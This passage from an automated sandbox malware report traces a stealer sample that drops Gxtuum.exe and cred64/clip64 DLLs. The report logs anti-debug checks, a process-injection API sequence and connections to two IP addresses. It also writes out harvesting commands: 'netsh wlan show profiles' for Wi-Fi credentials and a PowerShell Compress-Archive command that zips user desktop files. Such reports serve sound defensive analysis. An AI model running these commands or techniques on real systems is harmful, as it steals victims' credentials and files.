                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeAPI coverage: 4.3 %
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeAPI coverage: 2.6 %
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972Thread sleep count: 9621 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972Thread sleep time: -288630000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 7040Thread sleep time: -360000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 7044Thread sleep time: -360000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972Thread sleep count: 111 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972Thread sleep time: -3330000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep count: 6403 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1344Thread sleep count: 3391 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep count: 42 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924Thread sleep count: 7907 > 30
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924Thread sleep time: -7907000s >= -30000s
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924Thread sleep count: 2089 > 30
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924Thread sleep time: -2089000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -13835058055282155s >= -30000s
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756Thread sleep count: 2121 > 30
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756Thread sleep time: -2121000s >= -30000s
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756Thread sleep count: 7875 > 30
                        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756Thread sleep time: -7875000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C05BD9F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,12_2_6C05BD9F
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E93D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_002E93D0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
                        Source: tOuVwTJrau.exe, 00000000.00000003.1670615027.0000000001243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: rundll32.exe, 00000006.00000002.2138710552.000002583962C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWmNt(
                        Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.2924314576.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2137636900.0000021E0669D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.0000025839577000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.000002583962C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2924024643.0000000003116000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                        Source: rundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[$
                        Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                        Source: rundll32.exe, 0000000C.00000002.2924024643.0000000003116000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
                        Source: netsh.exe, 00000007.00000003.1737233028.0000018763765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                        Source: netsh.exe, 00000009.00000003.1737357431.0000020FC2F45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@@
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0030F25D
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030E250 mov eax, dword ptr fs:[00000030h]0_2_0030E250
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_003166E2 mov eax, dword ptr fs:[00000030h]0_2_003166E2
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0010E250 mov eax, dword ptr fs:[00000030h]1_2_0010E250
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_001166E2 mov eax, dword ptr fs:[00000030h]1_2_001166E2
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0010E250 mov eax, dword ptr fs:[00000030h]2_2_0010E250
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_001166E2 mov eax, dword ptr fs:[00000030h]2_2_001166E2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C05B881 mov eax, dword ptr fs:[00000030h]12_2_6C05B881
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C05A254 mov eax, dword ptr fs:[00000030h]12_2_6C05A254
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_00320BE2 GetProcessHeap,0_2_00320BE2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0030F25D
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0030A895
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030A9F8 SetUnhandledExceptionFilter,0_2_0030A9F8
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_00309FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00309FA8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0010F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0010F25D
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0010A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0010A895
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0010A9F8 SetUnhandledExceptionFilter,1_2_0010A9F8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_00109FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00109FA8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0010F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0010F25D
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0010A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0010A895
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0010A9F8 SetUnhandledExceptionFilter,2_2_0010A9F8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_00109FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00109FA8
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C059820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6C059820
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C057288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6C057288
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C056B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_6C056B1A

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80
                        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002E8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,0_2_002E8070
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, MainJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, MainJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, MainJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, MainJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030AA7F cpuid 0_2_0030AA7F
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: EnumSystemLocalesW,0_2_003227B8
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: EnumSystemLocalesW,0_2_00322803
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: EnumSystemLocalesW,0_2_003188AC
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: EnumSystemLocalesW,0_2_0032289E
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00322929
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: GetLocaleInfoW,0_2_00322B7C
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00322CA2
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: GetLocaleInfoW,0_2_00322DA8
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: GetLocaleInfoW,0_2_00318DCE
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00322E77
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00122516
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,1_2_00122711
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,1_2_001227B8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,1_2_00122803
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,1_2_0012289E
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,1_2_001188AC
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00122929
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,1_2_00122B7C
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00122CA2
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,1_2_00122DA8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,1_2_00118DCE
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00122E77
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,2_2_001227B8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,2_2_00122803
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,2_2_0012289E
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,2_2_001188AC
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00122929
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,2_2_00122B7C
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00122CA2
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,2_2_00122DA8
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,2_2_00118DCE
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00122E77
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.docx VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
